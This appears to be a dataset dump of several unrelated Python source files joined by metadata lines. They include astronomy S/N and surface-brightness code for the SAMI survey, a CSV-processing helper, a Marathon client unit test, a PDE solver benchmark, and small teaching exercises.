[ifus]\n\n print(\"I will calculate S/N for\", len(IFUlist), \"IFUs.\")\n\n SN_all_sq=np.empty((len(IFUlist), len(files)))\n\n for i in range(len(files)):\n\n insami=files[i]\n SN_all=sn_re(insami, tablein, plot=False, ifus=ifus, verbose=False)\n \n SN_all_sq[:,i]=SN_all*SN_all\n\n # Add the squared SN values and square root them\n SN_tot=np.sqrt(np.sum(SN_all_sq, axis=1))\n\n print(IFUlist)\n print(SN_tot)\n \ndef sn_re(insami, tablein, l1, l2, plot=False, ifus='all', \n log=True, verbose=True, output=False, seek_centroid=True):\n\n \"\"\" \n Purpose: Main function, estimates S/N for any or all probes in an RSS file. \n\n Input variables:\n\n insami [fits] Input RSS file. \n tablein [ascii] Observations table. \n l1, l2 [flt] Wavelength range for S/N estimation. \n ifus [str] Probe number, or 'all' for all 13. \n log [bool] Logarithimic scaling for plot -- CURRENTLY NOT ENVOKED. \n verbose [bool] Toggles diagnostic verbosity. \n\n Process: \n 1) Interpret input. \n [Set up plot]\n 2) Read target table (new format for SAMI survey), \n [Commence all-IFU loop, read data]\n 3) Identify wavelength range over which to estimate SNR, \n 4) Calculate SNR for all cores in the RSS file. \n 5) Locate galaxy centre as peak SNR core. \n 6) Identify cores intercepted by Re (listed). \n 7) Get SNR @Re as median of collapsed wavelength region. \n [End all-IFU loop]\n \"\"\"\n\n # --------------------\n # (1) Interpret input\n # --------------------\n if ifus == 'all':\n IFUlist = [1,2,3,4,5,6,7,8,9,10,11,12,13]\n else:\n IFUlist = ifu_num = [int(ifus)]\n\n n_IFU = len(IFUlist)\n\n if verbose: \n print('')\n print('--------------------------------')\n print('Running sami.observing.sn.sn_re.')\n print('--------------------------------')\n print('')\n if n_IFU == 1: print('Processing', n_IFU, 'IFU. Plotting is', end=' ') \n if n_IFU > 1: print('Processing', n_IFU, 'IFUs. Plotting is', end=' ') \n if not plot: print('OFF.')\n if plot: print('ON.')\n print('')\n\n # --------------------\n # Set up plot process\n # --------------------\n \n # Define number of cores, core diameter (in arcsec). \n # -- is this stored someplace in sami.utils/generic? \n n_core = 61\n r_core = 1.6\n \n # Create the figure\n if plot: \n\n # Get Field RA, DEC\n hdulist = pf.open(insami)\n primary_header = hdulist['PRIMARY'].header\n field_dec = primary_header['MEANDEC']\n\n # To create the even grid to display the cubes on \n # (accurate to 1/10th core diameter)\n dx = 4.44e-5 /np.cos(np.pi *field_dec /180.)\n dy = 4.44e-5\n \n fig = py.figure()\n # Number of rows and columns needed in the final display box\n # This is a bit of a fudge...\n if n_IFU==1:\n im_n_row = 1\n im_n_col = 1\n elif n_IFU==2:\n im_n_row = 1\n im_n_col = 2\n elif n_IFU==3:\n im_n_row = 1\n im_n_col = 3\n elif n_IFU==4:\n im_n_row = 2\n im_n_col = 2\n elif n_IFU>3 and n_IFU<=6:\n im_n_row = 2\n im_n_col = 3\n elif n_IFU>6 and n_IFU<=9:\n im_n_row = 3\n im_n_col = 3\n elif n_IFU>9 and n_IFU<=12:\n im_n_row = 3\n im_n_col = 4\n elif n_IFU>12:\n im_n_row = 4\n im_n_col = 4\n \n # ISK: trying to improve the rows and columns a bit: \n # def isodd(num): return num & 1 and True or False\n # if n <= 3:\n # r = 1\n # c = n\n # elif n > 6: \n # r = 3\n # c = 3\n \n # ----------------------\n # (2) Read target table\n # ----------------------\n tabname = ['name', 'ra', 'dec', 'r_petro', 'r_auto', 'z_tonry', 'zspec', \n 'M_r', 'Re', '', 'mu(Re)', 'mu(2Re)', 'ellip', 'PA', 'M*',\n 'g-i', 'A_g', 'CATID', 'SURV_SAMI', 'PRI_SAMI', 'BAD_CLASS']\n target_table = tab.read(tablein, names=tabname, data_start=0)\n CATID = target_table['CATID'].tolist()\n\n # Start a little counter to keep track \n # -- a fudge for the way the plot loop is set up... \n counter = 0\n\n # --------------------------\n # Commence the all-IFU loop\n # --------------------------\n for ifu_num in IFUlist:\n\n counter = counter + 1\n\n # Read single IFU\n myIFU = utils.IFU(insami, ifu_num, flag_name=False)\n\n # And find the row index for this SAMI target. \n try: \n this_galaxy = CATID.index(int(myIFU.name))\n no_such_galaxy = False\n except:\n this_galaxy = []\n no_such_galaxy = True\n pass\n\n \"\"\"\n There are other ways to do this with a numpy array as input. \n Lists are far better at this, so have made a CATID list. \n \n this_galaxy = np.where(target_table['CATID'] == int(myIFU.name))\n this_galaxy = np.where(CATID == int(myIFU.name))\n this_galaxy = [CATID == int(myIFU.name)]\n \"\"\"\n\n # ----------------------------\n # (3) Define wavelength range\n # ----------------------------\n\n if no_such_galaxy:\n z_target = 0.0\n z_string = '0.0'\n \n # see below for explanation of this. \n idx1 = l1\n idx2 = l2\n\n print(('-- IFU #' + str(ifu_num)))\n print(\" This galaxy was not found in the Target Table. \")\n\n else: \n z_target = target_table['zspec'][this_galaxy]\n z_string = str(z_target)\n\n l_range = myIFU.lambda_range\n l_rest = l_range/(1+z_target)\n \n # identify array elements closest to l1, l2 **in rest frame**\n idx1 = (np.abs(l_rest - l1)).argmin()\n idx2 = (np.abs(l_rest - l2)).argmin()\n \n if verbose: \n print('-------------------------------------------------------')\n print((' IFU #' + str(ifu_num)))\n print('-------------------------------------------------------')\n print((' Redshift: ' + z_string))\n print((' Spectral range: ' + \n str(np.around([l_rest[idx1], l_rest[idx2]]))))\n \n print((' Observed at: ' + \n str(np.around([l_range[idx1], l_range[idx2]]))))\n print('')\n \n # -------------------------\n # (4) Get SNR of all cores\n # -------------------------\n sn_spec = myIFU.data/np.sqrt(myIFU.var)\n \n # Median SN over lambda range (per Angstrom)\n sn = np.nanmedian(sn_spec[:, idx1:idx2], axis=1) * (1./myIFU.cdelt1)\n \n # ----------------------------------\n # (5) Find galaxy centre (peak SNR)\n # ----------------------------------\n # Initialise a couple of arrays for this loop\n core_distance = np.zeros(n_core)\n good_core = np.zeros(n_core)\n centroid_ra = 0.\n centroid_dec = 0.\n \n # Get target Re from table (i.e., match entry by name)\n if no_such_galaxy:\n print(\" No Re listed, calculating SNR at centroid instead.\")\n re_target = 0.\n\n else:\n re_target = target_table['Re'][this_galaxy]\n \n # Get either centroid, or table RA, DEC\n if seek_centroid: \n if no_such_galaxy:\n centroid = np.where(myIFU.n ==1)\n else:\n centroid = np.where(sn == np.nanmax(sn))\n centroid_ra = myIFU.xpos[centroid]\n centroid_dec = myIFU.ypos[centroid]\n\n if not seek_centroid: \n if no_such_galaxy:\n centroid = np.where(myIFU.n ==1)\n else:\n centroid_ra = target_table['ra'][this_galaxy]\n centroid_dec = target_table['dec'][this_galaxy]\n \n test_distance = 3600.* np.sqrt(\n (myIFU.xpos - centroid_ra)**2 +\n (myIFU.ypos - centroid_dec)**2 )\n centroid = np.abs(test_distance - 0).argmin()\n \n if verbose: \n print(' S/N @Centroid =', np.round(sn[centroid]), '[/Angstrom]')\n print('')\n\n # ---------------------------------------- \n # (6) Identify cores at approximately Re\n # ---------------------------------------- \n\n # Check that there is an Re listed, some times there isn't. \n if no_such_galaxy:\n sn_Re = 0.\n else:\n core_distance = 3600.* np.sqrt(\n (myIFU.xpos - centroid_ra)**2 +\n (myIFU.ypos - centroid_dec)**2 )\n \n good_core[(core_distance > re_target - 0.5*r_core) \n & (core_distance < re_target + 0.5*r_core)] = True\n \n # Get median S/N of cores @Re: \n if 1 in good_core:\n sn_Re = np.nanmedian(sn[good_core == True]) \n sn_min = min(sn[good_core == True])\n sn_max = max(sn[good_core == True])\n \n if verbose: \n if not 1 in good_core:\n sn_str = str(np.round(np.nanmedian(sn)))\n print(\"** Could not match Re\")\n print(('=> Median overall S/N = '+sn_str))\n print('')\n\n else:\n print('=> [Min, Max, Median] S/N @Re = [', end=' ')\n print('%0.2f' % min(sn[good_core == True]), ',', end=' ')\n print('%0.2f' % max(sn[good_core == True]), ',', end=' ')\n print('%0.2f' % sn_Re, '] [/Angstrom]')\n print('')\n \n\n # ----------\n # DRAW PLOT \n # ----------\n if plot:\n # Set image size to fit the bundle.\n size_im = 100\n N_im = np.arange(size_im)\n \n # Create a linear grid, centred at Fibre #1.\n x_ctr = myIFU.xpos[np.sum(np.where(myIFU.n == 1))]\n y_ctr = myIFU.ypos[np.sum(np.where(myIFU.n == 1))]\n \n # Set axis origin: highest RA, lowest DEC.\n x_0 = x_ctr + (size_im/2)*dx\n y_0 = y_ctr - (size_im/2)*dy\n \n # Direction of each axis: RA decreases, DEC increases. \n x_lin = x_0-N_im*dx\n y_lin = y_0+N_im*dy\n \n # Create image --\n # 1) Find indices of nearest linear points to actual core positions.\n b = 0 # (reset index)\n core_x = []\n core_y = []\n \n for b in range(n_core):\n \n nx = np.abs(x_lin - myIFU.xpos[b]).argmin()\n ny = np.abs(y_lin - myIFU.ypos[b]).argmin()\n \n core_x.append(nx)\n core_y.append(ny)\n \n # Make empty image.\n frame = np.empty((size_im,size_im)) + np.nan\n ax = fig.add_subplot(im_n_row, im_n_col, counter)\n ax.set_aspect('equal')\n\n # Colorise all fibres according to S/N; negatives set to zero. \n sn_norm = sn/np.nanmax(sn)\n sn_norm[sn < 0] = 0.0\n \n # Loop through all cores: \n a = 0 #reset index\n for a in range(n_core):\n\n # Make a Circle patch for each fibre in the bundle: \n art_core = Circle(xy = (core_x[a], core_y[a]), \n radius=4.8, color=str(sn_norm[a]))\n ax.add_artist(art_core)\n\n # and mark cores intersected by Re: \n if good_core[a]: \n art_good = Circle(xy = (core_x[a], core_y[a]), \n radius=4.8, alpha=0.7)\n ax.add_artist(art_good)\n\n frame[core_x[a], core_y[a]] = sn[a]\n \n ax = fig.add_subplot(im_n_row, im_n_col, counter)\n im = ax.imshow(np.transpose(frame), origin='lower', \n interpolation='nearest', cmap='gray')\n \n ax.set_title('Probe #'+str(ifu_num))\n fig.colorbar(im)\n\n # Write images\n if output: \n outsnfile='sn_'+np.str(l1)+'_'+np.str(l2)+'_'+\\\n str(ifu_num)+'_'+insami\n pf.writeto(outsnfile, np.transpose(frame), clobber=True)\n \n # Super title for plot\n py.suptitle(insami+', S/N map')\n\n if verbose: \n print('-------------------------------------------------------')\n\n \ndef read_targ_tab(tablein):\n \"\"\" Read a SAMI target table. \"\"\"\n tabname = ['name', 'ra', 'dec', 'r_petro', 'r_auto', 'z_tonry', 'zspec', \n 'M_r', 'Re', '', 'mu(Re)', 'mu(2Re)', 'ellip', 'PA', 'M*',\n 'g-i', 'A_g', 'CATID', 'SURV_SAMI', 'PRI_SAMI', 'BAD_CLASS']\n target_table = tab.read(tablein, names=tabname, data_start=0)\n return target_table\n\n\ndef sb(rssin, tablein, starin, ifus='all', \n starIDcol=0, starMAGcol=[5,6], area='fibre'):\n \"\"\" Make surface brightness maps of all IFUs in rssin, indicate SNR. \"\"\"\n\n from scipy.interpolate import griddata\n\n \"\"\" \n Use the secondary star to deduce zeropoint. \n Then translate flux to surface brightness. \n\n This should make use of the Gauss-fit code to fit the SBP of the star. \n For now I am just keeping the thing simple. \n\n 1) Identify secondary star. Should be only target not on 'tablein'. \n 2) Measure flux (for now of the whole probe). \n 3) Look up brightness of star on star table. \n 4) Deduce zeropoint. \n 5) Map SB of targets in all other probes. \n\n The 'area' input corresponds to the area over which the surface brightness\n is inter/extrapolated. The default is to measure per SAMI fibre, but it is\n possible to provide any area (e.g., per sq/ arcsec). \n \"\"\"\n \n # ---------------------------\n # (1) Identify secondary star \n # ---------------------------\n\n # First of all, read the colour of the spectrum in the primary header. \n myHDU = pf.open(rssin)\n colour = myHDU[0].header['SPECTID']\n myHDU.close()\n\n # Interpret input\n if ifus == 'all':\n IFUlist = [1,2,3,4,5,6,7,8,9,10,11,12,13]\n else:\n IFUlist = ifu_num = [int(ifus)]\n\n n_IFU = len(IFUlist)\n\n # Read star table\n star_table = tab.read(starin, header_start=0, data_start=1)\n RowID = star_table['RowID'].tolist()\n \n # Read SDSS throughputs\n sdss_col = ['wave', 'pt_secz=1.3', 'ext_secz=1.3', \n 'ext_secz=0.0', 'extinction']\n sdss_g = tab.read('SDSS_g.dat', quotechar=\"#\", names=sdss_col)\n sdss_r = tab.read('SDSS_r.dat', quotechar=\"#\", names=sdss_col)\n\n # Cycle through probes, identify star through CATID//RowID. \n found_star = False\n for ifu_num in IFUlist: \n \n # Read single IFU\n myIFU = utils.IFU(rssin, ifu_num, flag_name=False)\n nfib = np.shape(myIFU.data)[0]\n \n if int(myIFU.name) in RowID:\n found_star = True\n star = ifu_num\n print((\"Star found in Probe #\"+str(star)))\n\n # ----------------\n # (2) Measure flux\n # ----------------\n \"\"\"\n This needs to take into account the flux in limited spectral and \n spatial ranges. The spectral is taken care of (convolving with \n SDSS filter throughput), but the spatial is not. Should use the \n Gauss fit function and integrate, currently summing up all fibres.\n \"\"\"\n wave = myIFU.lambda_range\n if colour == 'RD':\n thru_regrid = griddata(sdss_r['wave'], sdss_r['ext_secz=1.3'], \n wave, method='cubic', fill_value=0.0)\n else:\n thru_regrid = griddata(sdss_g['wave'], sdss_g['ext_secz=1.3'], \n wave, method='cubic', fill_value=0.0)\n\n # Convolve flux and sum in a per-core basis.\n conv_fib = np.zeros(len(myIFU.data))\n for fib in range(nfib):\n conv_fib[fib] = np.nansum(myIFU.data[fib]*thru_regrid)\n \n \"\"\" \n Blue spectrum overlaps well with g' band, but r' does not, need \n extrapolate a flux according to the fixed F-type star spec-slope. \n The slope is straight, so a triangle approximation is alright. My \n model is this F-star:\n \n http://www.sdss.org/dr5/algorithms/spectemplates/spDR2-007.gif\n \n which I approximate to a right-angle triangle. The opposing and \n adjacent sides of the full (entire r' band) and curtailed (SAMI)\n triangles are [50, 1800] and [30, 1000], in units of [flux, Ang]. \n\n The relative areas are therefore differ by a factor of three and \n the extrapolated flux contained in the area of overlap between \n the SDSS r' and the SAMI red spectrum is 3. \n \"\"\" \n if colour == 'RD':\n flux = 3* np.nansum(conv_fib)\n else: \n flux = np.nansum(conv_fib)\n\n print((\"S(Flux) = \"+str(np.round(flux))+\" cts\"))\n\n \"\"\" \n Finally, need to check if the user is looking for a flux inter/\n extrapolated to an area different to that of the SAMI fibre. \n pi * (0.8\")**2 ~= 2.01 sq. asec.\n \"\"\" \n if area != 'fibre':\n flux = flux * (np.pi*0.8**2)/area\n\n # -------------------------\n # (3) Get listed brightness\n # -------------------------\n\n # Get g (blue) or r (red) mag from stars catalogue.\n\n # ID is column zero, unless otherwise set by starIDcol, \n # and g, r are 5, 6, unless set otherwise in starMAGcol.\n this_star = RowID.index(int(myIFU.name))\n\n if colour == 'RD':\n mag = star_table['r'][this_star]\n else:\n mag = star_table['g'][this_star]\n print((\"[ID, brightness] = \", RowID[this_star], mag))\n \n # --------------------\n # (4) Deduce zeropoint\n # --------------------\n # Red zeropoint tricky, as not entire r' is covered. Secondary stars are \n # F-class, so can assume a spectral slope. Going with flat, roughly OK. \n\n if colour == 'RD':\n # SAMI spectra roughly run from 6250 to 7450 A. \n # The SDSS r' band throughput between 5400 and 7230 A. \n \n zmag = mag + 2.5 * np.log10(flux)\n print((\"Calculated zeropoint as \"+str(np.round(zmag,decimals=2))+\" mag.\"))\n \n # -------------------------\n # (5) Map SB of all targets\n # -------------------------\n\n # Set up plot\n fig = plt.gcf()\n fig.clf()\n\n # Cycle through all IFUs. \n for ifu_num in IFUlist: \n \n if ifu_num != star: \n myIFU = utils.IFU(rssin, ifu_num, flag_name=False)\n s_flux = np.zeros(nfib)\n\n # and some plotty things\n fibtab = myIFU.fibtab\n offset_ra = np.zeros(nfib, dtype='double')\n offset_dec = np.zeros(nfib, dtype='double')\n\n # And loop through all fibres to get summed flux\n for fibnum in range(nfib):\n s_flux[fibnum] = np.nansum(myIFU.data[fibnum][:])\n\n # do some fibre positions while you're looping\n\n \"\"\"\n Adapting the plotting method from the BDF creation code. \n Not sure if this is the best. Check Lisa's display code. \n Should do it that way. \n \"\"\"\n \n # Get RAs and DECs of all fibres. \n ra1 = np.radians(myIFU.xpos[np.where(myIFU.n == 1)])\n dec1 = np.radians(myIFU.ypos[np.where(myIFU.n == 1)])\n ra_fib = np.radians(myIFU.xpos[fibnum])\n dec_fib = np.radians(myIFU.ypos[fibnum])\n \n # Angular distance\n cosA = np.cos(np.pi/2-dec1) * np.cos(np.pi/2-dec_fib) + \\\n np.sin(np.pi/2-dec1) * np.sin(np.pi/2-dec_fib) * \\\n np.cos(ra1-ra_fib) \n\n # DEC offset\n cos_dRA = np.cos(np.pi/2-dec1) * np.cos(np.pi/2-dec1) + \\\n np.sin(np.pi/2-dec1) * np.sin(np.pi/2-dec1) * \\\n np.cos(ra1-ra_fib) \n\n # RA offset\n cos_dDEC = np.cos(np.pi/2-dec1) * np.cos(np.pi/2-dec_fib) + \\\n np.sin(np.pi/2-dec1) * np.sin(np.pi/2-dec_fib) * \\\n np.cos(ra1-ra1) \n\n # Sign check; trig collapses everything to a single quadrant\n if (ra_fib >= ra1) and (dec_fib >= dec1): # 1. quadrant (+, +)\n offset_ra[fibnum] = np.degrees(np.arccos(cos_dRA[0]))\n offset_dec[fibnum] = np.degrees(np.arccos(cos_dDEC[0]))\n\n if (ra_fib <= ra1) and (dec_fib >= dec1): # 2. quadrant (-, +)\n offset_ra[fibnum] = \\\n np.negative(np.degrees(np.arccos(cos_dRA[0])))\n offset_dec[fibnum] = np.degrees(np.arccos(cos_dDEC[0]))\n\n if (ra_fib <= ra1) and (dec_fib <= dec1): # 3. quadrant (-, -)\n offset_ra[fibnum] = \\\n np.negative(np.degrees(np.arccos(cos_dRA[0])))\n offset_dec[fibnum] = \\\n np.negative(np.degrees(np.arccos(cos_dDEC[0])))\n\n if (ra_fib >= ra1) and (dec_fib <= dec1): # 4. quadrant (+, -)\n offset_ra[fibnum] = np.degrees(np.arccos(cos_dRA[0]))\n offset_dec[fibnum] = \\\n np.negative(np.degrees(np.arccos(cos_dDEC[0])))\n\n # Write a dictionary of relative RA, DEC lists\n datatab = {'RA': offset_ra, \n 'DEC': offset_dec} # proper, spherical trig, sky-projected\n\n # And finally get that surface brightness\n sb = zmag - 2.5 * np.log10(s_flux)\n \n # -------------------------\n # PLOT\n # -------------------------\n\n ax = fig.add_subplot(4,4,ifu_num)\n ax.set_aspect('equal')\n ax.set_xlim(-0.0022, 0.0022)\n ax.set_ylim(-0.0022, 0.0022)\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n plt.title(\"Probe #\"+str(ifu_num))\n\n # Normalise sb array for plot colouring\n norm = sb-min(sb)\n sb_norm = norm/max(norm)\n\n # Make a colorbar that maintains scale\n mappable = plt.cm.ScalarMappable(cmap='gray')\n mappable.set_array(sb)\n plt.colorbar(mappable)\n\n for i in range(nfib):\n this_col = str(sb_norm[i])\n circ = Circle((datatab['RA'][i], \n datatab['DEC'][i]), 0.8/3600.,\n edgecolor='none', facecolor=this_col)\n ax.add_patch(circ)\n plt.show()\n\n\n\n # Report if no star was identified in the supplied RSS file or probe. \n if not found_star:\n if ifus=='all':\n print((\"Did not find a secondary star in RSS file '\"+rssin+\"'\"))\n else:\n print((\"Did not find a secondary star in Probe #\"+str(ifus)+\".\"))\n","repo_name":"SAMI-Galaxy-Survey/sami","sub_path":"observing/sn.py","file_name":"sn.py","file_ext":"py","file_size_in_byte":26835,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"30838255538","text":"a=\"geeks for geeks\"\np=\"geeks\"\n\ndef paterrn():\n # res keeps first matching occurence value 0\n res=a.find(p)\n # whenever res get -1 means there is no matching occurence,then loops end\n while res>=0:\n print(res)\n res=a.find(p,res+1)\n\n\nprint(paterrn())","repo_name":"Ashis101/py-dsa","sub_path":"patternst.py","file_name":"patternst.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9338443875","text":"\"\"\"\nEsta função faz a leitura do Dataset, manipula os dados e faz a escrita do arquivode saida.csv.\nParametros de entrada: (dataset_name, arquivo_saida, target_group, delimiter_charac, tipo_escrita, quote_sys)\n\"\"\"\n\ndef func_escrita(dataset_name, arquivo_saida, target_group, delimiter_charac\n , param1, param2, param3, param4, tipo_escrita, quote_sys):\n import csv\n from func_catch_headers import header_index\n from func_catch_inicio_fim import inicio_fim_index\n\n # Inicialização de variáveis\n # Cuidado c/ \"IndexError: list index out of range\" nem todas as tabelas são do mesmo tamanho\n dic1 = header_index(dataset_name, target_group)\n # Incío Blk posição inicio_fim_blk[0] e fim inicio_fim_blk[1]\n inicio_fim_blk = inicio_fim_index(dataset_name, target_group)\n #i = 0 # Contador de Linha nula\n line_count = 0 # Contador de linha\n header_count = 0\n list_out = []\n with open(arquivo_saida, mode='a') as database_file:\n database_writer = csv.writer(database_file, delimiter=delimiter_charac, quotechar='\"', quoting=quote_sys, lineterminator='\\n')\n ...\n with open(dataset_name, newline='') as csvfile:\n spamreader = csv.reader(csvfile, delimiter=delimiter_charac) # separe por vírgula ou ponto e vírgula\n for line in spamreader:\n linha = line # line é uma variável do tipo lista, com os campos das tabelas\n result = str(linha).find(\"End of Block\") # Transf. linha->string e verif. ocor. seq. str \"End of Block\"\n if line_count <= 2 and tipo_escrita == 0: # Primeiras três linhas da B.D.\n database_writer.writerow(line)\n if line_count == (inicio_fim_blk[0] - 1) and tipo_escrita == 0: # Primeiro Cabeçalho Grupo de dados\n database_writer.writerow(line)\n if line_count == inicio_fim_blk[0] and tipo_escrita == 0: # Segundo cabeçalho do Grupo de dados\n database_writer.writerow(line)\n if target_group in line and tipo_escrita == 1: # Bloco de Dados alvo customiz. está aqui\n ... # func_customize deve ser chamada aqui p/ customizar os dados do grupo alvo\n #database_writer.writerow(line) # Escreve linha original sem customização\n # End. campos alvo conv.: line[dic1[\"Grupo\"]], line[dic1[\"Column1\"]], line[dic1[\"Column2\"]]...\n if param1 == 1:\n list_out.append(line[dic1[\"Grupo\"]])\n if param2 == 1:\n list_out.append(line[dic1[\"Coluna1\"]])\n if param3 == 1:\n list_out.append(line[dic1[\"Coluna2\"]])\n if param4 == 1:\n list_out.append(line[dic1[\"Coluna3\"]])\n print(list_out)\n database_writer.writerow(list_out) # Escreve linha customizada\n list_out = []\n #print(line[dic1[param1]], line[dic1[param2]], line[dic1[param3]], line[dic1[param4]])\n if result > 0 and tipo_escrita == 2: # Escrita do rodapé da B.D.\n database_writer.writerow([])\n database_writer.writerow(line)\n line_count += 1\n\n\n# func_chamada_escrita gera as tuplas de escrita, c/ var. parâmetros tipo_escrita e quote_sys\ndef func_chamada_escrita(input_param_list):\n print(*input_param_list)\n ...\n tuplas_escritas = ((0, 0), (1, 1), (2, 0))\n for i in range(3):\n func_escrita(*input_param_list, *tuplas_escritas[i])\n\n\n# Para Teste da Função\n# Sequencia de escrita- (0,0) - Esc. Cabeçalhos, (1,1) - Esc. Bloco Dados (2,0) - Escreve rodapé\n# Parametros de entrada\n# dataset_name = \"xxxx.csv\" # Conjunto de dados para estudo\n# arquivo_saida = \"C:/Users/User/Documents/arquivosaida.csv\" # Espec. caminho diretório saída e nome arquivo\n# target_group = \"Games\" # Grupo alvo da captura\n# tipo_escrita = 1 # 0= Escreve Cabeçalho, 1= Escreve Bloco de dados, 2= Escreve Rodape\n# quote_sys = 0 # 0=csv.QUOTE_MINIMAL, 1=csv.QUOTE_ALL\n# # Lista de parametros de entrada\n# input_param_list = (dataset_name, arquivo_saida, target_group, delimiter_charac)\n# func_chamada_escrita(input_param_list)","repo_name":"Vilson348/Script_Read_Write_CSV","sub_path":"func_writer.py","file_name":"func_writer.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28145796810","text":"#!/usr/bin/env python\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom dcos import errors\nimport mock\nfrom oslo_config import cfg\nimport requests_mock\n\nfrom kolla_mesos import exception\nfrom kolla_mesos import marathon\nfrom kolla_mesos.tests import base\n\n\nCONF = cfg.CONF\n\n\ndef add_app(app):\n return app\n\n\nclass TestMarathonClient(base.BaseTestCase):\n\n @requests_mock.mock()\n def setUp(self, req_mock):\n super(TestMarathonClient, self).setUp()\n CONF.set_override('host', 'http://127.0.0.1:8080', group='marathon')\n req_mock.get('http://127.0.0.1:8080/v2/info', json={\n 'version': '0.11.0'\n })\n self.client = marathon.Client()\n\n @mock.patch('dcos.marathon.Client.add_app')\n def test_add_app(self, dcos_add_app_mock):\n dcos_add_app_mock.side_effect = add_app\n\n with mock.patch.object(\n self.client, 'get_app', side_effect=errors.DCOSException()\n ):\n app = self.client.add_app({'id': 'my-new-app'})\n\n self.assertDictEqual(app, {'id': 'my-new-app'})\n\n @mock.patch.object(marathon, 'LOG')\n def test_add_app_already_existing(self, log_mock):\n CONF.set_override('force', False)\n with mock.patch.object(\n self.client, 'get_app', return_value={'id': 'my-app',\n 'other_param': 'the-old-one'}\n ):\n app = self.client.add_app({'id': 'my-app',\n 'other_param': 'the-new-one'})\n\n self.assertDictEqual(app, {'id': 'my-app',\n 'other_param': 'the-old-one'})\n log_mock.info.assert_called_with('App %s is already deployed. '\n 'If you want to replace it, please '\n 'use --force flag.', 'my-app')\n\n @mock.patch('dcos.marathon.Client.add_app')\n def test_add_app_already_existing_force(self, dcos_add_app_mock):\n CONF.set_override('force', True)\n dcos_add_app_mock.side_effect = add_app\n\n with base.nested(mock.patch.object(\n self.client, 'get_app', return_value={'id': 'my-app',\n 'other_param': 'the-old-one'}\n ), mock.patch.object(self.client, 'remove_app')):\n self.assertRaises(exception.MarathonRollback,\n self.client.add_app,\n {'id': 'my-app', 'other_param': 'the-new-one'})\n","repo_name":"nhlfr/kolla-mesos","sub_path":"kolla_mesos/tests/test_marathon.py","file_name":"test_marathon.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37513312886","text":"from time import perf_counter\nfrom itertools import product\n\nfrom memory_profiler import memory_usage\nimport numpy as np\n\nfrom src.dl_solver_heat2d import solve_heat_with_dl\nfrom src.dl_solver_poisson import solve_poisson_with_dl\nfrom src.fem_solver_heat2d import solve_heat_with_fem\nfrom src.fem_solver_poisson import solve_poisson_with_fem\n\n\ndef _true_solution_heat(t, x, y):\n return 1 + x * x + 3 * y * y + 1.2 * t\n\n\ndef _true_solution_poisson(x, y):\n return 1 + x + 2 * y\n\n\ndef _eval_solver(func, is_dl, is_heat):\n print('Calculations started.')\n start = perf_counter()\n mem_usage, result = memory_usage((func, (True,)), max_usage=True, retval=True)\n stop = perf_counter()\n print('Calculations finished.')\n print(f'Elapsed time: {stop - start:.4f} sec.')\n print(f'Memory footprint: {mem_usage:.2f} MB.')\n\n print('Measuring accuracy.')\n # mesh\n Lx, Ly = 1, 1\n Nx, Ny = 9, 9\n x = np.linspace(0, Lx, Nx)\n y = np.linspace(0, Ly, Ny)\n xx, yy = np.meshgrid(x, y)\n\n # true solution\n u_true = None\n samples = None\n if is_heat:\n T = 2\n samples = list(product([T], x, y))\n u_true = np.array([_true_solution_heat(*s) for s in samples])\n u_true = np.reshape(u_true, (Nx, Ny), 'F')\n else:\n samples = list(product(x, y))\n u_true = np.array([_true_solution_poisson(*s) for s in samples])\n u_true = np.reshape(u_true, (Nx, Ny), 'F')\n\n assert u_true is not None\n assert samples is not None\n\n # estimated solution\n u_pred = None\n if is_dl:\n u_pred = result.predict(samples)\n u_pred = np.reshape(np.array(u_pred), (Nx, Ny), 'F')\n else:\n if isinstance(result, list):\n # take last time\n u_pred = np.reshape(result[-1], (Nx, Ny))\n else:\n u_pred = np.reshape(result, (Nx, Ny))\n\n assert u_pred is not None\n\n # error\n e = np.abs(u_true - u_pred)\n print(f'Average error: {e.mean()}.')\n print(f'Max error: {e.max()}.')\n\n\ndef run_comparison():\n # FEM\n _eval_solver(solve_heat_with_fem, False, True)\n _eval_solver(solve_poisson_with_fem, False, False)\n\n # DL\n _eval_solver(solve_heat_with_dl, True, True)\n _eval_solver(solve_poisson_with_dl, True, False)\n\n\nif __name__ == '__main__':\n run_comparison()\n","repo_name":"cor3bit/pde-solvers","sub_path":"src/run_comparison.py","file_name":"run_comparison.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2059034986","text":"str1=input(\"Enter First String : \")\r\nstr2=input(\"Enter Second String : \")\r\nif len(str1)==len(str2):\r\n print(\"Strings are of equal length.\")\r\n print(\"Common characters in the strings are : \")\r\n for i in range(0,len(str1),1):\r\n if str1[i]==str2[i]:\r\n print(str1[i],end=\" \")\r\nelse:\r\n print(\"Strings are not of equal length.\")\r\n","repo_name":"paulram2810/Python-Programs","sub_path":"101.py","file_name":"101.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26532119566","text":"#DND Game Simulator\n#Current Functionality: Make basic character, roll for initiative\n\nimport random\n\n#global variables\nplayer = \"Test\"\n\n#Player class\nclass player():\n def __init__(self):\n self\n\n#Character class that defines what a character should look like\nclass character():\n\n #Gives parameters for character\n def __init__(self, name:str, sex:str, race:str, level:int, dex:int, strength:int):\n self.name = name\n self.sex = sex\n self.race = race\n self.level = level\n self.dex = dex\n self.strength = strength\n\n #Character level ups\n def levelUp(self, level_increase):\n self.level += 